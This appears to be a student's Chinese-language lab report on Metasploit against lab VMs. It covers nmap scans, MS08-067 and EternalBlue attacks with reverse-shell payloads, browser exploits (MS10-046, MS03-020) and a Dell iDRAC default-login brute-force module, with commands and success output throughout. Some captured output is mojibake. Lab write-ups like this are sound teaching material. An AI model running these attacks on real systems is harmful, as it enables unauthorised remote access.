寫在前面
20200604:這個博客為啥有這么多的流量,我呆了,簡直引流之主……
原文:
上一次實驗,我遇到了一個問題,我的硬盤不夠用了。
我這主機小身板磁盤加一塊就256G,我的D盤還有8G,我還有一個matlab需要安裝。
所以
我去加了內存,嘿嘿
現在內存是夠用的,但是這次試驗以前我連着裝Linux、Windows2003、WindowsXP、Windows7也是挺快樂的,真的。
實驗總結
實驗完成情況
本次四個要求項都已完成,主動攻擊方面嘗試了MS08-067和MS17-010,瀏覽器方面嘗試了MS10-046,客戶端方面嘗試了針對IE瀏覽器的MS03-020,自我嘗試部分使用了針對dell的iDRAC的一個掃描器。
實驗的開始階段,由於我手上的Windows2003是中文版的,許多漏洞不支持,失敗了幾次,后來改用了英文版的XP和Win7就基本都能成功了。
MSF基礎應用的一般過程
這個實驗其實就是一個套路
首先想做什么就搜什么(search),選定一個就用(use),看一看大致什么情況(info),選一個payload(show payloads),選一個大寶貝(set payload []),看一下什么要求(show option),按照要求看看哪些必要(yes的項目),使用set設定(LPORT/LHOST etc.),運行(exploit)。
基礎問題問答
用自己的話解釋什么是exploit,payload,encode.
exploit:利用工具找到的漏洞,並對漏洞進行分析,從而攻擊。
payload:有效載荷,可以理解為搞破壞的關鍵代碼。電腦病毒中可以直接完成預定目標的代碼段便是其“有效載荷”。
encode:通過一些特殊手段的編碼,可以既保證有效載荷不被破壞,又使得漏洞攻擊程序不會被偵察到。
實驗體會
本次的實驗不難,是一個對exp4的繼承和發展,讓我對msf有了更深入的掌握,在嘗試上浪費了一些時間,但也學到了分析問題的能力。
距離實戰的技術或步驟
信息上,還需要掌握最新的漏洞信息
技術上,需要學會如何隱藏自己的攻擊
實驗過程
眾人的成功總是千篇一律,有趣的失敗萬里挑一。
失敗的嘗試
firefox_webidl_injection
在進行針對瀏覽器的攻擊方面,我還嘗試了一些其他的漏洞,比如針對火狐的firefox_webidl_injection,但是各個靶機都不符合要求。
MS06-071
還有是另一個針對XML的漏洞,編號MS06-071,這個漏洞被解決的時間比較早, 我手上的幾個版本都已經修復了,攻擊過程的截圖被我不小心丟了
CVE-2010-4452
還有一個Java的漏洞,編號CVE-2010-4452(https://www.cvedetails.com/cve/CVE-2010-4452/),但是嘗試之后只有顯示連接的消息,沒有提供命令行,可能是我的載荷選擇有問題。
這漏洞如果攻擊win10的話,可以看到聯網提示
MS05-054
這個漏洞是使用用戶點擊允許網頁彈出界面后進行注入的,我不太確定運行是否成功。
注入后會提醒安全提示
選擇同意
產生回連信息
針對Adobe的攻擊
這個部分我嘗試了好幾次,沒有成功。我認為可能是我的reader選擇的有問題
說到reader
我先是去adobe官網下載了各種遠古版本reader,但是都安裝失敗了,網絡上其他版本的reader可以安裝在XP上,但嘗試攻擊都不成功,我覺得是已經被修補了的版本,我尋思有找其他版本reader的時間,我還不如試試其他的,所以嘗試了IE瀏覽器的漏洞,但這樣又有一種還是針對瀏覽器的感覺,我也不知行不行。
對,我還試過excel的漏洞,但是遠古office比reader還難裝=。=
主動攻擊實踐
攻擊准備-掃描靶機系統
掃描WindowsXP
命令:
nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.126
結果:
[*] exec: nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.126
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:15 CST
Nmap scan report for 192.168.124.126
Host is up (0.00095s latency).
All 1000 scanned ports on 192.168.124.126 are filtered
MAC Address: 00:0C:29:5F:53:72 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.95 ms 192.168.124.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds
掃描Windows2003
命令:
nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122
結果:
msf5 > nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122
[*] exec: nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.124.122
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:23 CST
Nmap scan report for 192.168.124.122
Host is up (0.0012s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:62:8C:54 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
TRACEROUTE
HOP RTT ADDRESS
1 1.19 ms 192.168.124.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.21 seconds
MS08-067漏洞滲透攻擊實踐
什么是MS08-067?
Microsoft 安全公告 MS08-067 - 嚴重
- 2017/10/11
服務器服務中的漏洞可能允許遠程執行代碼 (958644)
發布時間: 2008年10月23日
版本: 1.0
一般信息
摘要
此安全更新解決了服務器服務中一個秘密報告的漏洞。 如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標准的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。
攻擊過程
msf5 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
攻擊成功的命令行結果
msf5 exploit(windows/smb/ms08_067_netapi) > set set RHOSTS 192.168.124.126
set => RHOSTS 192.168.124.126
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.124.124:4306
[*] 192.168.124.126:445 - Automatically detecting the target...
[*] 192.168.124.126:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.124.126:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.124.126:445 - Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.124.124:4306 -> 192.168.124.126:1061) at 2020-05-02 17:46:22 +0800
systeminfo
systeminfo
Host Name: PETER-E04D978AD
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
實驗結果分析
這里的結果非常的amazing啊
![]()
Host Name: PETER-E04D978AD(主機名稱)
OS Name: Microsoft Windows XP Professional(系統名稱、版本)
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Peter Don(注冊所有人)
Registered Organization:
Product ID: 76487-640-0059266-23187
Original Install Date: 5/1/2020, 11:12:58 PM(初始安裝時間,那個連裝四個操作系統的下午)
System Up Time: 0 Days, 0 Hours, 48 Minutes, 34 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform(系統模型)
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
01: x86 Family 6 Model 142 Stepping 9 GenuineIntel ~2903 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi(時區)
Total Physical Memory: 511 MB(內存情況)
Available Physical Memory: 333 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,004 MB
Virtual Memory: In Use: 44 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.(補丁情況)
NetWork Card(s): 2 NIC(s) Installed.(兩張網卡,一張是虛擬機提供的,另一個是藍牙)
01: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.124.1
IP address(es)
[02]: Bluetooth Device (Personal Area Network)
Connection Name: Bluetooth Network Connection
Status: Media disconnected
MS17_010漏洞滲透攻擊實踐
什么是MS17-010?
Microsoft 安全公告 MS17-010 - 嚴重
Microsoft Windows SMB 服務器安全更新 (4013389)
發布日期:2017 年 3 月 14 日
版本:1.0
執行摘要
此安全更新程序修復了 Microsoft Windows 中的多個漏洞。如果攻擊者向 Windows SMBv1 服務器發送特殊設計的消息,那么其中最嚴重的漏洞可能允許遠程執行代碼。
如果攻擊win10?當然不成功
攻擊過程
使用namp掃描漏洞
msf5 > nmap --script=vuln 192.168.124.126
[*] exec: nmap --script=vuln 192.168.124.126
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-02 17:50 CST
Nmap scan report for 192.168.124.126
Host is up (0.0018s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
MAC Address: 00:0C:29:5F:53:72 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 17.01 seconds
經過查詢有三種:
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
命令
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload generic/shell_reverse_tcp
show options
set RHOST [靶機IP]
set LHOST [本地IP]
exploit
攻擊成功報告:
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.124.125:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
systeminfo
systeminfo
������: WIN-O4TRDF665LL
OS ����: Microsoft Windows 7 רҵ��
OS �汾: 6.1.7601 Service Pack 1 Build 7601
OS ������: Microsoft Corporation
OS ����: ��������վ
OS ��������: Multiprocessor Free
ע���������: Windows �û�
ע�����֯:
��Ʒ ID: 00371-OEM-8992671-00524
��ʼ��װ����: 2020/5/1, 19:58:52
ϵͳ����ʱ��: 2020/5/2, 18:46:34
ϵͳ������: VMware, Inc.
ϵͳ�ͺ�: VMware Virtual Platform
ϵͳ����: x64-based PC
������: ��װ�� 1 ����������
[01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~2904 Mhz
BIOS �汾: Phoenix Technologies LTD 6.00, 2018/4/13
Windows Ŀ¼: C:\Windows
ϵͳĿ¼: C:\Windows\system32
�����豸: \Device\HarddiskVolume1
ϵͳ��������: zh-cn;����(�й�)
���뷨��������: zh-cn;����(�й�)
ʱ��: (UTC+08:00)���������죬����ر�����������³ľ��
�����ڴ�����: 2,047 MB
���õ������ڴ�: 1,399 MB
�����ڴ�: ���ֵ: 4,095 MB
�����ڴ�: ����: 3,385 MB
�����ڴ�: ʹ����: 710 MB
ҳ���ļ�λ��: C:\pagefile.sys
��: WORKGROUP
��¼������: ��ȱ
������: ��װ�� 3 ��������
[01]: KB2534111
[02]: KB2999226
[03]: KB976902
����: ��װ�� 2 �� NIC��
[01]: Intel(R) PRO/1000 MT Network Connection
������: ��������
���� DHCP: ��
DHCP ������: 192.168.124.1
IP ��ַ
[01]: 192.168.124.125
[02]: fe80::c813:fa10:7b76:6c0c
[02]: Bluetooth �豸(����������)
������: Bluetooth ��������
״̬: ý���������ж�
針對瀏覽器的攻擊
ms10_046漏洞攻擊
什么是ms10-046?
Microsoft 安全公告 MS10-046 - 嚴重
- 2017/10/11
Windows Shell 中的漏洞可能允許遠程執行代碼 (2286198)
發布時間: 2010年8月2日 | 更新時間: 2010年8月24日
版本: 1.2
一般信息
摘要
此安全更新解決了 Windows Shell 中一個公開披露的漏洞。 如果顯示特制的快捷方式圖標,則該漏洞可能允許遠程執行代碼。 成功利用此漏洞的攻擊者可以獲得與本地用戶相同的用戶權限。 那些帳戶被配置為擁有較少系統用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。
攻擊過程:
cd /usr/share/metasploit-framework/modules/exploits/windows/browser
ms10_046_shortcut_icon_dllloader.rb
search ms10_046
use windows/browser/ms10_046_shortcut_icon_dllloader
show payloads
set payload windows/meterpreter/reverse_tcp
set LHOST [本地IP]
set SRVHOS [本地IP]
exploit
攻擊結果
針對客戶端的攻擊
針對IE瀏覽器的MS03-020漏洞攻擊(唯一)
什么是MS03-020?
(以下省略無關部分)
Microsoft安全公告MS03-020-嚴重
Internet Explorer的累積修補程序(818529)
發布時間:2003年6月4日| 更新日期:2003年6月4日
版本: 1.1
最初發布: 2003年6月4日
摘要
漏洞的影響: 允許攻擊者在用戶的系統上執行代碼
最高嚴重等級: 嚴重
建議: 系統管理員應立即安裝補丁
最終用戶公告: 可從以下位置獲得此公告的最終用戶版本:
http://www.microsoft.com/athome/security/update/bulletins/default.mspx。
受影響的軟件:
- Microsoft Internet Explorer 5.01
- Microsoft Internet瀏覽器5.5
- Microsoft Internet Explorer 6.0
- Windows Server 2003的Microsoft Internet Explorer 6.0
一般信息
技術細節
技術說明:
這是一個累積性補丁,其中包括Internet Explorer 5.01、5.5和6.0以前所有已發布補丁的功能。此外,它消除了兩個新發現的漏洞:
- 由於Internet Explorer無法正確確定從Web服務器返回的對象類型而發生的緩沖區溢出漏洞。利用此漏洞的攻擊者有可能在用戶的系統上運行任意代碼。如果用戶訪問了攻擊者的網站,則攻擊者可能無需任何其他用戶操作即可利用此漏洞。攻擊者還可能制作試圖利用此漏洞的HTML電子郵件。
- 由於Internet Explorer在文件下載對話框上未實現適當的阻止而導致的缺陷。攻擊者可能利用此漏洞在用戶系統上運行任意代碼。如果用戶只是訪問了攻擊者的網站,則攻擊者可能無需任何其他用戶操作即可利用此漏洞。攻擊者還可能制作試圖利用此漏洞的HTML電子郵件。
為了利用這些缺陷,攻擊者必須創建一種特殊格式的HTML電子郵件並將其發送給用戶。或者,攻擊者必須擁有一個惡意網站,該網站包含旨在利用這些漏洞的網頁。然后,攻擊者必須說服用戶訪問該站點。
與公告MS03-004和MS03-015一起發布的以前的Internet Explorer累積修補程序一樣,如果您尚未應用HTML幫助更新,則此累積修補程序將導致window.showHelp()停止運行。如果您已經安裝了知識庫文章811630中更新的HTML幫助控件,則在應用此修補程序之后,仍然可以使用HTML幫助功能。
過程
搜索explorer
使用info查看漏洞,確認可以攻擊
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
需要輸入本地的IP或者廣播地址,默認8080端口,都可以不改
查看載荷show payload
使用祖傳載荷
show option
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
還需要輸入LHOST和LPORT,而后即可攻擊,圖為本地主機的反彈鏈接
成功應用任何一個輔助模塊
掃描工具Dell iDRAC Default Login(唯一)
首先查找有興趣的漏洞,因為我的主機是dell的,我找了一個dell的掃描器。
iDRAC 是什么?
帶 Lifecycle Controller 的集成戴爾遠程訪問控制器 (iDRAC) 嵌入在每個 Dell EMC PowerEdge™ 服務器中,其功能可幫助 IT 管理員部署、更新、監控和維護服務器,而無需安裝任何額外軟件。Dell iDRAC 的工作不受操作系統或虛擬機管理程序存在的影響,因為 iDRAC 在出廠時就已嵌入每個服務器中,其已准備好從預操作系統或裸機狀態工作。
使用info進行查看
msf5 auxiliary(scanner/http/dell_idrac) > info
Name: Dell iDRAC Default Login
Module: auxiliary/scanner/http/dell_idrac
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Cristiano Maruti <cmaruti@gmail.com>
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/idrac_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.124.118 yes The target address range or CIDR identifier
RPORT 443 yes Default remote port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /data/login yes Path to the iDRAC Administration page
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/idrac_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Description:
This module attempts to login to a iDRAC webserver instance using
default username and password. Tested against Dell Remote Access
Controller 6 - Express version 1.50 and 1.85
可以看到要求的配置項不多,它大概就是嘗試使用默認的用戶名和密碼對Dell的這個遠程控制軟件進行登錄。